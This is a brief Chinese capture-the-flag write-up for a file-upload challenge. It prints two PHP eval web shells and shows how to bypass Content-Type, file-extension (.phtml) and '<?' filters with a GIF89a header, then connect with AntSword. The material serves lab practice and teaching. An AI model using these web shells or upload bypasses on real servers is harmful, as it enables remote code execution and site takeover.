文件上传-[极客大挑战 2019]Upload 1
作者:互联网
首先打开网址之后是一个文件上传
直接上传一句话木马
<?php @eval($_POST['attack']);?>
然后我们抓包改成Content-Type:image/jpeg
之后又发现其对文件后缀名进行了限制过滤了(绕过的方法php3,php4,php5,phtml,pht)
发现php3,php4,php5被过滤了将文件后缀改成phtml就可以
发现文件里面不允许包含<?
那么绕过
GIF89a? <script language="php">eval($_REQUEST[1])</script>
上传成功
接下来找文件路径
基本都是upload/filename
然后找到路径使用蚁剑连接
getflag
标签:文件,phtml,极客,Upload,2019,php4,php5,上传,php3 来源: https://www.cnblogs.com/iwantflag/p/15086831.html